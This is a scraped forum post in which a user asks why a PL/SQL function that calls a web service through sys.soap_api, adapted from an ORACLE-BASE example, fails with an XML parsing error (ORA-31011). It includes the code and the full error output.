Appreciate your help here. Thanks, MK. 4. Re: Question on webservices in Oracle816802 Aug 24, 2013 12:22 AM (in response to 816802) Hi All, I am able to create a WSDL document given below. This WSDL is create for a function and this function just returns a value (2 in this case). The function does not accept any input parameters. Now I am trying to access this WSDL in a PLSQL code and it is not working. I googled and found one code in Oracle-Base ORACLE-BASE - Oracle Consuming Web Services In this site the WSDL they provided is (). This URL they are replacing in the code in the below section l_url := ''; l_namespace := 'xmlns=""'; l_method := 'ws_add'; l_soap_action := ''; l_result_name := 'return'; Now I also simulated the same and my code looks as given below. CREATE OR REPLACE FUNCTION add_numbers RETURN NUMBER AS l_request sys.soap_api.t_request; l_response sys.soap_api.t_response; l_return VARCHAR2(32767); l_url VARCHAR2(32767); l_namespace VARCHAR2(32767); l_method VARCHAR2(32767); l_soap_action VARCHAR2(32767); l_result_name VARCHAR2(32767); BEGIN --l_url := ''; --l_namespace := 'xmlns=""'; --l_method := 'ws_add'; --l_soap_action := ''; --l_result_name := 'return'; l_url := ''; l_namespace := 'xmlns=""'; l_method := 'ws_add'; l_soap_action := ''; l_result_name := 'return'; l_request := sys.soap_api.new_request(p_method => l_method, p_namespace => l_namespace); sys.soap_api.add_parameter(p_request => l_request, p_name => 'int1', p_type => 'xsd:integer', p_value => 10); /* sys.soap_api.add_parameter(p_request => l_request, p_name => 'int2', p_type => 'xsd:integer', p_value => p_int_2); */ l_response := sys.soap_api.invoke(p_request => l_request, p_url => l_url, p_action => l_soap_action); l_return := sys.soap_api.get_return_value(p_response => l_response, p_name => l_result_name, p_namespace => NULL); RETURN l_return; END; But when I execute the code I am getting the below error. select add_numbers from dual; ERROR at line 1: ORA-31011: XML parsing failed ORA-19202: Error occurred in XML processing LPX-00104: Warning: element "HTML" is not declared in the DTD Error at line 2 ORA-06512: at "SYS.XMLTYPE", line 48 ORA-06512: at "SYS.SOAP_API", line 153 ORA-06512: at "TEST.ADD_NUMBERS", line 43 Can anyone let me know what would be the issue. Thanks, MK.>
https://community.oracle.com/message/11159923
CC-MAIN-2017-09
refinedweb
721
53.41
Created on 2010-02-09.14:34:08 by ssteiner, last changed 2014-07-10.00:00:28 by zyasoft. <script language="jython" setbeans="false"> <![CDATA[ import sys for x in sys.path: print x ]]> </script> This is a problem in other places that create an embedded jython via the Java API (new PythonInterpreter()), like modjy and likely the jsr223 support as well The new PythonInterpreter doesn't import site like the command line does. Alan Kennedy and I agreed that we should change this (mostly for modjy's sake) and create a flag to disable the behavior. CPython already acts this way when you create an embedded interpreter via its C API Unfortunately I forgot to change this before the 2.5 release. It's a fairly significant change so it'll have to wait for 2.6 Deferring this breaking change to 2.7 Alan, Philip: was this done for 2.7? Can this be closed? AFAIK it has not been done yet This issue is about 'import'ing site into all embedded interpreters, by default, which does not happen right now, and should. Back when the issue was reported, I put special coding into modjy to handle this. Now that we're changing major versions (2.5 to 2.7 is major), it's time to put that right, and remove that support from modjy and push it down into PySystemState. Question is, how do we enable the user to switch it off, akin to the "-S" command line option? I think we need a new registry property for this, the default value of which causes loading of site.py. Possibilities include A: "python.site", a brand new property, which defaults to "true". B: "python.options.site", a brand new property, which defaults to "true". I will undertake the relevant work. When this is complete, this is a fairly major change that will affect all users who embed jython, a very substantial part of our user base, I believe. So we'll have to get our messaging right on this. There's an outstanding pull request that we should apply. Note that it does not yet also change org.python.core.Options such that this default can be changed. Per other such option settings, I would suggest we use python.options.importSite as the actual setting name. Should be part of beta 4 at the latest So the PR is fine, we just need to add some testing to get it into trunk. We will control with the importSite option. Fixed as of
http://bugs.jython.org/issue1552
CC-MAIN-2015-18
refinedweb
426
76.42
Processing Form DataLingeshP Nov 29, 2012 9:39 AM Hi, I'm new to CQ and I'm trying to achieve the user registration and login functionality for a website. Below are the questions for which I'm looking for clarifications 1. How do we process the user entered data upon submission? Since we are processing the form data against the external Database/Webservice, Is there any generic approach that I can follow in CQ to achieve this? Expected functionality, 1. user fills the form(any form) 2. upon submission process the form data 3. Based on the processing, redirect to result page. Request your suggestions on this. Thanks in advance. Regards, Lingesh P. 1. Re: Processing Form Datarush_pawan Nov 30, 2012 6:43 AM (in response to LingeshP)1 person found this helpful Hello Lingesh, I would prefer you to refer which help you to know how you can use existing OOTB form component and various configuration options. Now once you done with above then you can configure the form to use custom servlet by providing custom servlet path in "Action Configuration (Content path)" inside "Advance tab" Servlet will help you to do process on form submission as you mentioned above. How you can develop servlet refer my earlier post for example - from above example you can call servlet using "/libs/testservlet.json" same can set in ( "Action Configuration (Content path)" inside "Advance tab" as mentioned above) I hope it will help you proceed. Let me know for more information or above doesn't help you. Thanks, Pawan 2. Re: Processing Form DataLingeshP Dec 1, 2012 9:12 AM (in response to rush_pawan) Hi Pawan, Thanks for your inputs !. I just tried the option you have suggested and done the following. 1. Created a custom form action component and able to list in the action type. 2. Included forward.jsp, for now the path is just hardcoded FormsHelper.setForwardPath(slingRequest, "/libs/TestServlet.html"); FormsHelper.setRedirectToReferrer(request, true); 3. Created two servlets TestServlet and SampleServlet, in which TestServlet extend SlingAllMethodsServlet and SampleServlet extends the HttpServlet. Generated bundle out of this 4. For testing both the servlets will print some logger and redirects to another page using sendRedirect method. 5. In the form components, i have configured /libs/TestServlet.html in the advanced tab. And when I submit the form it shows the below error. I was not clear about this issue and hence tried point 6 Not a Sling HTTP request/response Cannot serve request to /content/formpage.html in com.kpn.login.testproject.TestServlet Exception: javax.servlet.ServletException: Not a Sling HTTP request/response at org.apache.sling.api.servlets.SlingSafeMethodsServlet.service(SlingSafeMethodsServlet.jav a:374) at org.apache.sling.engine.impl.request.RequestData.service(RequestData.java:500) at org.apache.sling.engine.impl.filter.SlingComponentFilterChain.render(SlingComponentFilter Chain.java:45) 6. Created a SampleServlet which extend HttpServlet and cofigured /libs/SampleServlet.html in the cocntent path. With this configuration I'm able to render the form data and redirection works fine. However I'm not able to understand what went wrong when I used TestServlet. Out of these two which servlet is preferred? Also,I have a question on the action configuration. 1. Is it mandatory to have forward.jsp in the action component even when we set the cotent path(servlet path) in the advanced tab? How this works? Thanks in advance. Regards, Lingesh P. 3. Re: Processing Form Datarush_pawan Dec 1, 2012 9:38 PM (in response to LingeshP) Hi, Please check whether you can access TestServlet directly through HTTP call or not means just call if you get response (200) means the servlet is deployed and visible through sling servlet registry. if you get error then plz check how you have configured it also plz check @Property(name = "sling.servlet.paths", value = "<servlet path >"), how you have configured it. Answere your other questions 1. Using sling servlet is correct option but for form also dont forget to override doPost method as from form you will generate post call. 2. I think as per your requirement you need not required forward.jsp to override because that you can do through your servlet any how, so try to handle it from there only. I hope it helps you for more information let me know. Thanks, Pawan 4. Re: Processing Form DataLingeshP Dec 2, 2012 10:12 PM (in response to rush_pawan) Hi Pawan, I just checked the configuration in the sling servlet file. PFB the TestServlet for your reference. With this configuration I'm still getting "Not a sling HTTP request/response" error. package com.kpn.login.testproject; import java.io.IOException; import java.io.Serializable; import javax.servlet.Servlet; import javax.servlet.ServletException; import org.apache.sling.api.SlingHttpServletRequest; import org.apache.sling.api.SlingHttpServletResponse; import org.apache.sling.api.servlets.SlingAllMethodsServlet;; @Service(value = Servlet.class) @Component(immediate = true, metatype = true) @Properties( { @Property(name = "sling.servlet.paths", value = "/libs/TestServlet.html"), @Property(name = "service.description", value = "abcd"), @Property(name = "label", value = "TestServlet") }) public class TestServlet extends SlingAllMethodsServlet implements Serializable{ /** * */ private static final long serialVersionUID = 1L; protected void doGet(SlingHttpServletRequest request, SlingHttpServletResponse response) throws ServletException, IOException { final Logger logger = LoggerFactory.getLogger(TestServlet.class); logger.info("Inside Servlet"); response.sendRedirect("/content/testpage.html"); } @Override protected void doPost(SlingHttpServletRequest request, SlingHttpServletResponse response) throws ServletException, IOException { doGet(request, response); } }
https://forums.adobe.com/thread/1107067
CC-MAIN-2017-39
refinedweb
889
52.05
How to Spin Up an HTAP Database in 5 Minutes With TiDB + TiSpark How to Spin Up an HTAP Database in 5 Minutes With TiDB + TiSpark Let's look at how to spin up a standard TiDB cluster using Docker Compose on your local computer, so you can get a taste of its hybrid power. Join the DZone community and get the full member experience.Join For Free TiDB is an open-source distributed Hybrid Transactional and Analytical Processing (HTAP) database built by PingCAP, powering companies to do real-time data analytics on live transactional data in the same data warehouse — no more ETL, no more T+1, no more delays. More than 200 companies are now using TiDB in production. Its 2.0 version was launched in late April 2018 (read about it in this post). In this 5-minute tutorial, we will show you how to spin up a standard TiDB cluster using Docker Compose on your local computer, so you can get a taste of its hybrid power, before using it for work or your own project in production. A standard TiDB cluster includes TiDB (MySQL compatible stateless SQL layer), TiKV (a distributed transactional key-value store where the data is stored), and TiSpark (an Apache Spark plug-in that powers complex analytical queries within the TiDB ecosystem). Ready? Let’s get started! Setting Up Before we start deploying TiDB, we’ll need a few things first: wget, Git, Docker, and a MySQL client. If you don’t have them installed already, here are the instructions to get them. Setting Up MacOS - To install brew, go here. - To install wget, use the command below in your Terminal: brew install wget --with-libressl - To install Git, use the command below in your Terminal: brew install git - Install Docker:. - Install a MySQL client: brew install mysql-client Setting Up Linux -: You need to log out and back in for this to take effect. Then use the following command to verify that Docker is running normally: sudo systemctl start docker # start docker daemo docker info Spin Up a TiDB Cluster Now that Docker is set up, let’s deploy TiDB! - Clone TiDB Docker Compose onto your laptop: git clone - Optionally, you can use docker-compose pullto get the latest Docker images. - Change your directory to tidb-docker-compose: cd tidb-docker-compose - Deploy TiDB on your laptop: docker-compose up -d You can see messages in your terminal launching the default components of a TiDB cluster: 1 TiDB instance, 3 TiKV instances, 3 Placement Driver (PD) instances, Prometheus, Grafana, 2 TiSpark instances (one master, one slave), and a TiDB-Vision instance. Your terminal will show something like this: Congratulations! You have just deployed a TiDB cluster on your laptop! To check if your deployment is successful: - Go to: to launch Grafana with default user/password: admin/admin. - Go to Homeand click on the pull down menu to see dashboards of different TiDB components: TiDB, TiKV, PD, entire cluster. - You will see a dashboard full of panels and stats on your current TiDB cluster. Feel free to play around in Grafana, e.g. TiDB-Cluster-TiKV, or TiDB-Cluster-PD. Grafana display of TiKV metrics - Now go to TiDB-vision at (TiDB-vision is a cluster visualization tool to see data transfer and load-balancing inside your cluster). - You can see a ring of 3 TiKV nodes. TiKV applies the Raft consensus protocol to provide strong consistency and high availability. Light grey blocks are empty spaces, dark grey blocks are Raft followers, and dark green blocks are Raft leaders. If you see flashing green bands, that represent communications between TiKV nodes. - It looks something like this: TiDB-vision Test TiDB Compatibility With MySQL As we mentioned, TiDB is MySQL compatible. You can use TiDB as MySQL slaves with instant horizontal scalability. That’s how many innovative tech companies, like Mobike, use TiDB. To test out this MySQL compatibility: - Keep the tidb-docker-composerunning, and launch a new Terminal tab or window. - Add MySQL to the path (if you haven’t already): export PATH=${PATH}:/usr/local/mysql/bin - Launch a MySQL client that connects to TiDB: mysql -h 127.0.0.1 -P 4000 -u root Result: You will see the following message, which shows that TiDB is indeed connected to your MySQL instance: Note: TiDB version number may be different. Server version: 5.7.10-TiDB-v2.0.0-rc.4-31 The Compatibility of TiDB with MySQL Let’s Get Some Data! Now we will grab some sample data that we can play around with. - Open a new Terminal tab or window and download the tispark-sample-data.tar.gzfile. wget - Unzip the sample file: tar zxvf tispark-sample-data.tar.gz - Inject the sample test data from sample data folder to MySQL: This will take a few seconds. mysql --local-infile=1 -u root -h 127.0.0.1 -P 4000 < tispark-sample-data/dss.ddl - Go back to your MySQL client window or tab, and see what’s in there: Result: You can see the SHOW DATABASES; TPCH_001database on the list. That’s the sample data we just ported over. Now let’s go into TPCH_001: Result: You can see all the tables in USE TPCH_001; SHOW TABLES; TPCH_001, like NATION, ORDERS, etc. - Let’s see what’s in the NATIONtable: SELECT * FROM NATION; Result: You’ll see a list of countries with some keys and comments. Launch TiSpark Now let’s launch TiSpark, the last missing piece of our hybrid database puzzle. - In the same window where you downloaded TiSpark sample data (or open a new tab), go back to the tidb-docker-composedirectory. - Launch Spark within TiDB with the following command: This will take a few minutes. Result: Now you can Spark! docker-compose exec tispark-master /opt/spark-2.1.1-bin-hadoop2.7/bin/spark-shell - Use the following three commands, one by one, to bind TiSpark to this Spark instance and map to the database TPCH_001, the same sample data that are available in our MySQL instance: It looks something like this: import org.apache.spark.sql.TiContext val ti = new TiContext(spark) ti.tidbMapDatabase("TPCH_001") - Now, let’s see what’s in the NATIONtable (should be the same as what we saw on our MySQL client): Result: spark.sql("select * from nation").show(30); Let’s Get Hybrid! Now, let’s go back to the MySQL tab or window, make some changes to our tables, and see if the changes show up on the TiSpark side. - In the MySQL client, try this UPDATE: UPDATE NATION SET N_NATIONKEY=444 WHERE N_NAME="CANADA"; SELECT * FROM NATION; - Then see if the update worked: SELECT * FROM NATION; - Now go to the TiSpark Terminal window, and see if you can see the same update: Result: The spark.sql("select * from nation").show(30); UPDATEyou made on the MySQL side shows up immediately in TiSpark! You can see that both the MySQL and TiSpark clients return the same results – fresh data for you to do analytics on right away. Voila! Summary With this simple deployment of TiDB on your local machine, you now have a functioning Hybrid Transactional and Analytical processing (HTAP) database. You can continue to make changes to the data in your MySQL client (simulating transactional workloads) and analyze the data with those changes in TiSpark (simulating real-time analytics). Of course, launching TiDB on your local machine is purely for experimental purposes. If you are interested in trying out TiDB for your production environment, send us a note or reach out on our website. We’d be happy to help you! Published at DZone with permission of Jin Queeny . See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/how-to-spin-up-an-htap-database-in-5-minutes-with?fromrel=true
CC-MAIN-2019-26
refinedweb
1,310
62.48
I am looking to remotely query a list of servers, to ensure they are "set up" correctly One of the things I want to check is the Local Security Policy -> User Rights Assignment ->Deny Log on through terminal services Is it possible to retrieve this information through through script? Using NTrights looks to almost get there, but that looks to set or revoke not list permissions. NTrights Most servers I am interested in are Windows Server 2003. I am running PowerShell 2.0. The best recommendation I have right now is that you check out using WMI for this (see root\RSOP\computer namespace). Unfortunately all the times that this topic has come up, I never seem to have been able to find a solution to it. There's an old thread on MSDN from 2007 that was never answered either. You can use SAPIEN WMI Explorer (link below), a free community tool, to browse the WMI namespace and see if what you're looking for is there. I don't believe it is, but you might find some other useful things there. I was looking for similar and found this community post that uses output from secedit and parses through it 12 months ago
http://serverfault.com/questions/182297/powershell-query-remote-local-security-policy
crawl-003
refinedweb
205
68.2
Intelligent MEMS sensors on breakout boards jumpstart many maker projects. Off-the-shelf drivers can get an analog sensor reading from a prototype in minutes. If sample rates are in seconds instead of milliseconds, those off-the-shelf drivers may work. Want to sample faster? Looking at sampling strategies can help makers unlock more smart sensor capabilities. A microcontroller in one of these smart sensors handles I2C or SPI timing, analog-to-digital (A/D) sampling mode and rates, digital filtering, and more. Advanced inertial measurement units (IMUs) often add sensor fusion processing. For a simpler example, I’ll use the Bosch Sensortec BMP390L digital pressure sensor I’m working with in a project. Adafruit has employed the BMP390L digital pressure sensor in its precision barometric pressure and altimeter breakout. Simple polling, inexact sample rate The BMP390L starts out in “forced” mode: wake up, read, and go back to sleep. Adafruit’s CircuitPython driver runs in this mode, saving power in many applications. It returns pressure and temperature readings and performs compensation. An application snippet reveals three important parameters: import board import busio import adafruit_bmp3xx # I2C setup i2c = busio.I2C(board.SCL, board.SDA) bmp = adafruit_bmp3xx.BMP3XX_I2C(i2c) samples = 1000 bmp.pressure_oversampling = 16 bmp.temperature_oversampling = 1 bmp.filter_coefficient = 2 n = 0 while n < samples: PAm[n] = bmp.altitude n += 1 Oversampling settings for pressure and temperature reduce noise and increase effective resolution of A/D conversion. In the BMP390 sensor, resolution is 16 bits with no oversampling, increasing to 21 bits with x32 oversampling. Filter coefficient configures an infinite impulse response (IIR) filter, handy for taking out sudden spikes from a wind gust or a slammed door. Why not oversample and filter all the time for noise, precision, and spikes? The big tradeoff is power consumption. When reading once a minute with oversampling off—a weather station use case—sensor power is only 4 μA and pressure noise is 3.7 Pa. For a 50-Hz drone use case, x8 oversampling and x2 filtering cut pressure noise by 80%, but power consumption is 570 μA. The other tradeoff is output data rate, or ODR. In a tight loop like this, the limiting factor for ODR is the conversion time of the sensor, which increases with oversampling. For the BMP390, the pressure sensor has a bit longer settling time than the temperature sensor. Tconv = 234 μs + press_en * (392 μs + (press_osr) * 2020 μs) + temp_en * (163 μs + (temp_osr) * 2020 μs) With both pressure and temperature sensors enabled and no oversampling (press_osr = 1), this works out to a typical 4.83-ms time for a 207-Hz theoretical ODR. With x16 pressure oversampling in our example code, conversion time is 35.13 ms, for a 28.47 Hz theoretical ODR. Measuring the actual polling code on 1,000 samples, the best average ODR has seen is 26.2 Hz, and the worst is 23.6 Hz. That wide range is likely due to variation in sensor wake-up time for every sample—a figure unspecified in the BMP390 docs. Free running for selected ODRs Another BMP390L sampling mode removes some uncertainty. Placing the sensor in “normal” mode cycles readings at a programmed rate into a shadow register, preventing values from changing while being read. Prescaler settings are fixed; the BMP390L starts at an ODR of 200 Hz and divides down to 100, 50, 25, 12.5, 6.25, and so on to times in seconds. The Adafruit CircuitPython BMP390L driver requires a bit of surgery, creating setters for sensor_mode and sample_rate. The application snippet is mostly unchanged, using the modified driver and introducing a slight read delay. import board import busio import adafruit_bmp3xx_normal # I2C setup i2c = busio.I2C(board.SCL, board.SDA) bmp = adafruit_bmp3xx_normal.BMP3XX_I2C(i2c) samples = 1000 ODR = 25 bmp.sample_rate = ODR bmp.sensor_mode = "normal" sample_wait = 1/ODR - 0.002 bmp.pressure_oversampling = 16 bmp.temperature_oversampling = 1 bmp.filter_coefficient = 2 n = 0 while n < samples: PAm[n] = bmp.altitude n += 1 time.sleep(sample_wait) Measuring the free running code on 1,000 samples shows an actual 25-Hz ODR nearly every run. There’s some risk in the 2 ms sample_wait, nearing CircuitPython’s 1 ms system timer resolution. Even if read timing varies slightly, sensor timing is known to be 25 Hz. For faster ODRs, power consumption in normal mode and forced mode is similar, because the sensor is awake for almost the entire duty cycle. Also note that the conversion time formula still applies. If the ODR is set higher than 25 Hz, oversampling must be reduced accordingly, or the actual ODR falls behind as samples accumulate. Dig into the docs and drivers I took this free running approach because it was simpler driver work. I haven’t yet worked on a unified BMP390 driver for both forced and normal modes. If CircuitPython supported external interrupts, another option would be replacing the asynchronous read/delay with a routine serving the data-ready interrupt from the BMP390L. Also, the BMP390L supports a FIFO, which would be a much more complex driver effort, but would keep reads on schedule. Another point is that different intelligent MEMS sensors have different ODR choices. For example, my project also has an ICM-20649 accelerometer and gyro, which has a prescaler setting of 23.9 Hz instead of 25 Hz. That may force a move to an ODR of 50 Hz for the BMP390 and 50.4 Hz for the ICM-20649, with slightly less oversampling. When projects need sub-second sampling at specific intervals, there’s more to think about than just reading the sensor. Drivers should provide control of sampling mode, ODR, oversampling, and filtering. Digging into sensor docs and code provides insights for successful projects. After spending a decade in missile guidance systems at General Dynamics, Don Dingee became an evangelist for VMEbus and single-board computer technology at Motorola. He writes about sensors, ADCs/DACs, and signal processing for Planet Analog. Related Content: - Data Acquisition and Instrumentation: The DAS and Sensors - Carbon Dioxide Sensor Based on Photoacoustic Technology - Sampling rates for analog sensors - CO2 Sensors Help Smart Devices Clear the Air - Robust and Precise Barometric Pressure Sensor for Wearables in Harsh Environments
https://www.planetanalog.com/making-sense-of-smart-sensor-sampling/
CC-MAIN-2021-21
refinedweb
1,028
57.98
I am looking for java predefined classes in the Parasoft Hi Team, I am trying to create sample java class in the parasoft but it asking for Java class name and method . Please help me on this. Thanks, Swapna 0 Hi Team, I am trying to create sample java class in the parasoft but it asking for Java class name and method . Please help me on this. Thanks, Swapna Swapna how did you create your "sample java class"? Do you have it added in Parasoft>Preferences>System Properties ( and restarted tool)? More information how to use Java project in SAOtest you can find in section "Using Eclipse Java Projects" in User Manual or here Ireneusz Szmigiel Hi Ireneusz, I would like to write java code in the Extension Tool to read the data from data source Thanks, Swapna Hi Swapna as I said, all details how to create Java Project in SOAtest you can find in documentation. I think you can take a look here You can find there thread about your question. Ireneusz Szmigiel Hi Swapna, As a side note, you can also use the Groovy scripting language to write code, as Groovy accepts Java syntax (making it my personal scripting language of choice). If you want to use Java as a scripting language, you will have to create an external Java class and add it into the the System Properties as @Ireneusz Szmigiel noted. Hope this helps! Thanks Thomas and Ireneusz . how do we know the predefined methods and classes in parasoft . For ex: import com.parasoft.api.* void checkDataSource(Object input, ScriptingContext context) { List firstCol = context.getValues( "MyDS", // set this to the name of your data source "A") // set this to the name of some column in your data source Application.showMessage(Integer.toString(firstCol.size())) } how do we know getValues method is available in context object? can you please help me on this?please don't mind if i am asking wrong question? Thanks, Swapna Hi Team, How we can know the classes available in the parasoft.api package like IOUtil as mentioned in the below. for ex: rom com.parasoft.api import * from soaptest.api import * from java.util import * from java.text import * from java.lang import * from com.parasoft.api import IOUtil from java.io import File Thanks, Swapna Hi Team Please help me on the documentation for the Parasoft api calls for better understanding about the methods. Ex: def customAssertion(Object input, ScriptingContext context) { String value = context.getValue("New Datasource","xyx"); String encoded = "text" + value.bytes.encodeBase64().toString() } Thanks, Swapna Hi Swapna, As @bpowell commented here, You can take a look at the pre-defined methods that are available for scripting use under Help > Help Contents and search for "Index (Extensibility API)". Once there, you can search for the method that you are looking to use and get all the information you need. Hope this helps! Thanks @bpowell and @Thomas Moore
https://forums.parasoft.com/discussion/comment/9156
CC-MAIN-2018-22
refinedweb
489
66.64
Friday October 17 1997, the final day of the Sixth International Python Conference, is Developers' Day, where the Python community will have the opportunity to discuss the future of Python with its creator Guido van Rossum. This provides the Python community with the exciting opportunity to be involved in charting the future course of the Python language and implementation. Developer's Day is going to be less formal than the other days of the Python Conference. We have a number of topics, listed below, that are being championed by volunteers. These champions are responsible for presenting brief position statements or proposals, soliciting comments from the audience, and getting the discussions going. While it is very difficult to tell ahead of time which topics will generate the most heat (or light), and which will be non-controversial, we don't intend to let any particular topic go longer than about 45 minutes. By that time, most participants will be burned out anyway. The day will be roughly divided into six 45 minute sessions, although both the allotment of time per topic, and scheduling of topic per session has not yet been determined. There will be a morning break from 10:30 to 11:00 am, a lunch break from 12:30 to 2:00, and an afternoon break from 3:30 to 4:00 pm. A free-for-all is planned from 4:00 onwards, for those who want to stay late. Be prepared for impromptu discussions cropping up at any time of the day or night, over lunch, dinner, beers, or even the Monday Night football game where the Redskins will be beating the Cowboys. :-) Here is the current list of topics, along with their champions. Where possible, a short position statement is given if provided by the champion. Stay tuned to the newsgroup/mailing list for more details. We apologize in advance for any short-changing of times that might occur. There's lots to discuss, and I'm sure more interesting topics will crop up as the conference progresses. If past conferences are any indication, this should be one of the livelier days! :-) For questions and comments, please email Barry Warsaw, Developers' Day Chair, IPC6 Sixth International Python Conference Developer's Day Session on Language Features or Idioms to Support Object Interfaces The 6th Internationl Python Workshop will feature a developers day that provides a place to discuss and debate Python language issues "face-to-face". The subject of one of these sessions will be language features or idioms to support object interfaces. Problem Two of the Fundemental ideas in object oriented development are - separation of object interfaces from object implementation, and - ability to use objects with the same interface but different implementations interchangably. When used properly, these two features provide many benefits, such as safety, stability, flexibility, reuse, and so on. Unfortunately, most computer languages provide very little support for reasoning about or testing interfaces. Worse, many languages provide incomplete or missleading interface information. Compounding the problem is that commonly used jargon has many and often conflicting interpretations. For example, the terms "class" and "type" may alternately mean interface or implementation. Even the term "interface" can have different meanings. For some, "interface" refers to method signatures, while for others, the term connotes identical behavior. For the sake of this discussion, I will use the term interface in the stronger sense. Two objects have the same interface if they have the same abstract behavior and are are substitutable wrt the interface. For some time, Python programmers have wanted simple and efficient means to be able to test object interfaces. Foe example, a function may be willing to accept an argument that is either a "number" or a "sequence" and must be able to test whether the argument is one or the other to decide how it is used. As Python is used for larger projects and in a larger number of domains, reliability of Python programs is an increasing concern. People would like language support to help assure program correctness. Python 1.5 adds the ability to include assertions in programs and recent advances in the ability to extend class semantics provides the ability to experiment with argument interface checking and Meyer's "development by contract" It has been suggested that this session might be combined with a session on use of static typing to support optimization. I assert that this sort of typing is really about implementation, not interfaces. I beleave strongly that reasoning about interfaces and reasoning about implentation should be kept distinct. Some disagree with me on this point. Objective The objective of this session is to explore possible language features or idioms to support interfaces. Format I would like to follow the following format for this session: - Brief overview of the problem, - Position statements - Discussion Participants and non-participants are invited to submit *concise* position statements to me (at least 24 hours) prior to the session. Position statements should address one or more of the following topics: - Needs and requirements for interfaces, - Proposals for langauage features or idionms to support interface, - Aguments for or against separation of abstract interfaces from static typing. Time permitting and authors present and willing willing, position statements may be presented during the session. Note that the entire session is only 45 minutes in length, and I want to reserve a significant amount of time for discussion. Position statements must be concise. No more than 5 minutes will be allowed per presentations. If there is not enough time for positions to be presented individually, I will do my best to summarize. Concise position statements will be included in the proceedings. I apologize for the lateness of this post. International Python Conference VI Developer's Day Session on Combining Python Type and Class Semantics The 6th Internationl Python Conference will feature a developers day that provides a place to discuss and debate Python language issues "face-to-face". The subject of one of these sessions will be integration of python types and classes. Problem Currently, Python provides two ways of defining new kinds of objects: - Python classes (written in Python) - Extension types (written in C or. Python programmers are often confused by the differences between extension type instances and class instances. - A type instance has a meaningful type, but no __class__. A class instance has a meaningful __class__, but a meaningless type. - To discover a type instance's interface, __methods__ and __members__ attributes must be inspected. To discover a class instance's interface, it's, __dict__, and __class__ attributes must be inspected. - A class provides access to method meta-data, a type does not. - A class instance is created in a standard way, by calling it's class. There is no standard way to create a type instance. - A class can be subclassed but a type can not (usually). - class instance methods have discoverable method signatures, but type instance methods do not. Objective The objective of this session is to to take a step toward integrating classes and types. Format I would like to follow the following format for this session: - Brief overview of the problem, - Position statements - Discussion Participants are invited to submit position statements to me (at least 24 hours) prior to the session. Position statements should address one or both of: - Requirements for or desirability of class/type integration, - Proposals or approaches for class/type integration Time permitting and author's willing, position statements may be presented during the session. Problem Python's text processing today is based on the built-in string type, which allows to represent byte sequences. Most character processing modules assume one byte per character. In order to support more than one language, or to support languages with more than 256 characters, some sort of wide string or multi byte character string processing is required. One approach is to support Unicode, the other is to allow for arbitrary character sets (the approaches are not necessarily exclusive). Tightly related to the character sets is the user interface: The user needs to enter information in her native language, and wants to get results displayed using that language. When it comes to introducing new interfaces in Python, a top requirement is to make the modules uniform across platforms. Unfortunately, there is no straight-forward solution, as nationalization issues are handled differently among platforms. Objective The objective of this session is to communicate the needs of both end users and application programmers for internationalization support in Python. Participants are invited to contribute to the following issues: - reports about I18N projects in general, or I18N projects involving Python in particular - application programmer requirements for I18N in the core language and the standard libraries - approaches to harmonizing new interfaces among platforms Problem: Python is being used increasingly as an extension language for C and C++ systems. A number of tools such as SWIG, Modulator, GRAD, etc... have also been developed to ease the process of C/C++ extension writing. However, there are also a number of concerns including (but not limited to) the following : - Are automated tools effective at building Python extensions? - Can Python be used effectively with existing C/C++ applications? What are the limitations? - Separation of C/C++ implementation and the Python interface. (i.e. should C/C++ programs know that Python is involved?) - How do you effectively manage C/C++ objects in Python? - How do you use advanced C++ features such as templates, exceptions, namespaces, etc... - Integration with other Python extensions (Numeric Python, extension classes, etc...). Objective: The purpose of this session is to discuss the state of Python-C/C++ integration tools and techniques. Participants are invited to contribute to any number of the following topics (or any other closely related topic) : - Successful use of Python extension tools. - Failures and shortcomings of existing approaches. - Alternative and novel Python extension writing techniques. So far the String-SIG's only deliverable item has been an enhanced regular expression module. Since beta versions of this module are now available for testing, should the SIG be shut down, or are there new tasks to be considered? Some suggestions for a new objective have been: a Unicode string type; internationalization issues; code for implementing and generating parsers. My goal for this session is to moderate and to initiate the discussion between application developers that use Python and ILU. Objectives: This session will discuss the design and development of applications that use ILU and Python. Format: Applications using ILU and Python Sample Discussion Topics New CORBA bindings for Python ISL vs IDL Integration with other languages Performance Platforms Problems Debugging applications State of the Distributed Object SIG I apologize for the lateness of this post.
http://www.python.org/workshops/1997-10/devday.html
crawl-001
refinedweb
1,773
52.39
Apache FOP uses Apache Jakarta Commons Logging as a logging abstraction kit. [1] should give you the basics and has links to further information on configuring logging the way you want it to behave. I hope that helps. [1] On 04.03.2006 20:44:55 Tracey Zellmann wrote: > I have dug through what documentation I can find, but it hasn't helped me, > so maybe the list can give me some guidance. > > I have my application running successfully. I am using fop > 0.91beta-bin-jdk1.4 It publishes a PDF using FOP within another java > application, not from the command line, so I believe you would call it > embedded. > > I need to change the way logging messages are handled. Currently, I am > getting a large number of warning messages printed to the console. With > Jeremias Maerki's help, I can see they are caused my some namespace issues > with some imported svg images I am using from MS Visio. Essentially, they > can be ignored, and that is what I have been doing. However, next week, I > have to turn this over to the first wave of "normal" users, so I don't want > to overwhelm them with these messages. > > I would like all messages to go to a log file, not the console. I would > prefer that warning level messages go to a file that is typically > overwritten, so they don't accumulate. Anything higher than warning should > go to another file which does append and accumulates the message history. I > am pretty sure I could handle this using Java's java.util.logging API. > However, I am not sure how to get hold of and change the current behavior of > FOP logging. > > Can someone illuminate this for me? > > Thanks. Jeremias Maerki --------------------------------------------------------------------- To unsubscribe, e-mail: fop-users-unsubscribe@xmlgraphics.apache.org For additional commands, e-mail: fop-users-help@xmlgraphics.apache.org
https://mail-archives.us.apache.org/mod_mbox/xmlgraphics-fop-users/200603.mbox/%3C20060306095029.8B07.DEV@jeremias-maerki.ch%3E
CC-MAIN-2021-31
refinedweb
315
66.03
